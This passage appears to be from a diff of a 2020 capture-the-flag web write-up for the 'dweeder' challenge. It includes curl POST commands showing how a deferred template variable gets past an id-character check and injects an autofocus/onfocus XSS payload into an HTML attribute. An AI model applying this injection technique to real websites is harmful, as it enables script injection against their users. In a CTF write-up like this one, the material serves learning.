LalaNguyen/CTF/Year-2020/Web-Writeups.md

 curl -d "token=eyJleHBpcnkiOm51bGwsImNvbnRlbnQiOnsibmFtZSI6InRlc3QxMjMiLCJoYW5kbGUiOiJ0ZXN0MjEzIn19:QmTpmSxf7FunhP98U3qAWP/vgJpmEbw4XHrpBkdqVIg=&title=a&contents=a&id=\"" -X POST https://dweeder.ctf.kaf.sh/apis/dweeder/?writeDweed
 {"result":"3136303531343736343936676d33","status":true}
 ```
 However, visiting the dweed renders nothing at this time.
 This was because the check within the insertDweed() found out that there was an illegal character "\" in the id's value, so it immediately returned.

-Fortunately, we could craft an id's value like this ``\${myvar}`` which passed the check.
+Fortunately, since the server allowed new parameter creation(e.g.,$myvar), and since ``$myvar`` would be resolved after the check, we temporarily assigned id = ${myvar} in order to pass the first check.
+Later, ${myvar} would be resolved during template population.
 Note that we need to escape the dollar sign.

-Since the server allows new parameter creation, and since ``$myvar`` shall be updated during the template's population after the id validation, we chained them together to get a new effective id.
-If ``${myvar}`` can be replaced with \" then we can indirectly assign ${id} = \".
-Let's see:

 ```bash
 curl -d "token=eyJleHBpcnkiOm51bGwsImNvbnRlbnQiOnsibmFtZSI6InRlc3QxMjMiLCJoYW5kbGUiOiJ0ZXN0MjEzIn19:QmTpmSxf7FunhP98U3qAWP/vgJpmEbw4XHrpBkdqVIg=&title=a&contents=a&id=\${myvar}&myvar='\" tabindex=1 onfocus=\"alert(1)\" autofocus " -X POST https://dweeder.ctf.kaf.sh/apis/dweeder/?writeDweed